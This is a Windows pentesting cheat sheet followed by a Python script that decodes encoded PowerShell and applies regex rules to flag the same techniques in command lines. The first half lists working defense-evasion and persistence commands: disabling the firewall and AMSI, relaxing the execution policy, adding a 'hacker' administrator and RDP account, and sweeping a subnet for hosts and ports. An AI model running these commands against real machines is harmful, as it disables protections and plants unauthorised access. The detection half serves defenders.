Windows Tricks
PowerShell encoded base64
Encode the command as UTF-16LE and then base64 so it can be passed to powershell -enc (-EncodedCommand) without quoting or bad-character problems.
$ echo -n 'ping -n 2 10.10.14.2' | iconv -t utf-16le | base64 -w 0
cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA==
Payload: cmd /c powershell -nop -enc cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA==
Run a command as another user (with credentials)
$pass = ConvertTo-SecureString "aliceishere" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("disco\Alice", $pass)
Invoke-Command -ComputerName disco -Credential $cred -ScriptBlock {whoami}
List running processes with their command-line arguments
WMIC path win32_process get Caption,Processid,Commandline
Scan for hosts and open ports in subnet
PS > 1..254 | ForEach-Object {Test-Connection -ComputerName "172.16.2.$_" -Count 1 -ErrorAction SilentlyContinue}
PS > 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("172.16.2.101",$_)) "Port $_ is open!"} 2>$null
PowerShell (full path, and resetting PATH if it has been clobbered)
c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
set PATH=%SystemRoot%\system32;%SystemRoot%;
Search for files
Get-ChildItem -Path C:\ -Include *filetosearch* -Recurse -ErrorAction SilentlyContinue
Windows Security
Disable Firewall
NetSh Advfirewall set allprofiles state off
Disable AMSI
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
Disable Defender
Execution Policy
Set-ExecutionPolicy Unrestricted
Set-ExecutionPolicy Unrestricted -Scope CurrentUser
Add an RDP user
net user hacker hacker123 /add
net localgroup Administrators hacker /add
net localgroup "Remote Desktop Users" hacker /ADD
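Everything on this page (the -enc encoding at the top, the firewall, AMSI and execution-policy changes, the host and port sweep, and the net user / net localgroup additions) shows up in process command-line telemetry, which is where a defender would look for it. The Python below is an added example and not part of the original page: it mirrors the iconv -t utf-16le | base64 step so the page's encoded string can be verified, decodes a -EncodedCommand argument (base64 of UTF-16LE text), and runs a small set of regex rules over constructed sample command lines and over any decoded payload. The sample lines, rule names and regexes are my own assumptions, not a vendor's detection content.

```python
import base64
import re

# Constructed sample process command lines, modelled on the tricks above
# (not captured from any real host).
SAMPLE_CMDLINES = [
    "cmd /c powershell -nop -enc cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA==",
    "NetSh Advfirewall set allprofiles state off",
    "powershell.exe -Command Set-ExecutionPolicy Unrestricted -Scope CurrentUser",
    "net user hacker hacker123 /add",
    'net localgroup "Remote Desktop Users" hacker /ADD',
    "powershell.exe Get-ChildItem -Path C:\\Users -Recurse",
]

# powershell.exe accepts -EncodedCommand and its unambiguous prefixes
# (-e, -ec, -en, -enc); the argument is base64 of UTF-16LE text.
ENC_FLAG = re.compile(r"(?i)(?<!\S)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")

# Detection rules (assumed names and patterns). Each regex is applied to the
# raw command line and, when present, to the decoded -enc payload as well.
RULES = {
    "encoded_powershell": ENC_FLAG,
    "firewall_disabled": re.compile(r"(?i)netsh\s+advfirewall\s+set\s+\w+\s+state\s+off"),
    "amsi_provider_removed": re.compile(r"(?i)remove-item\b.*\\amsi\\providers"),
    "execution_policy_relaxed": re.compile(r"(?i)set-executionpolicy\s+(?:unrestricted|bypass)"),
    "local_user_added": re.compile(r"(?i)\bnet\s+user\s+\S+\s+\S+\s+/add\b"),
    "privileged_group_change": re.compile(
        r'(?i)\bnet\s+localgroup\s+(?:administrators|"remote desktop users")\s+\S+\s+/add\b'),
    "host_or_port_sweep": re.compile(
        r"(?i)net\.sockets\.tcpclient|test-connection\s+-computername\s+\S*\$_"),
}


def encode_command(text):
    """Same transform as `iconv -t utf-16le | base64 -w 0`: what powershell -enc expects."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent or invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # binascii.Error is a ValueError; odd-length data fails the UTF-16 decode
        return None


def analyze(cmdline):
    """Classify one command line; returns (decoded payload or None, sorted finding names)."""
    decoded = decode_encoded_command(cmdline)
    texts = [cmdline] + ([decoded] if decoded else [])
    findings = {name for name, rx in RULES.items() for t in texts if rx.search(t)}
    return decoded, sorted(findings)


def scan(cmdlines):
    """Run analyze() over many command lines, keeping only those with findings."""
    report = []
    for line in cmdlines:
        decoded, findings = analyze(line)
        if findings:
            report.append({"cmdline": line, "decoded": decoded, "findings": findings})
    return report


if __name__ == "__main__":
    for hit in scan(SAMPLE_CMDLINES):
        print(hit["findings"], "<-", hit["decoded"] or hit["cmdline"])
```

Running the rules against the decoded payload as well as the raw line is the point: an encoded `net localgroup Administrators ... /add` produces the same finding as the plain one, so abbreviating or encoding the flag does not change what the report says.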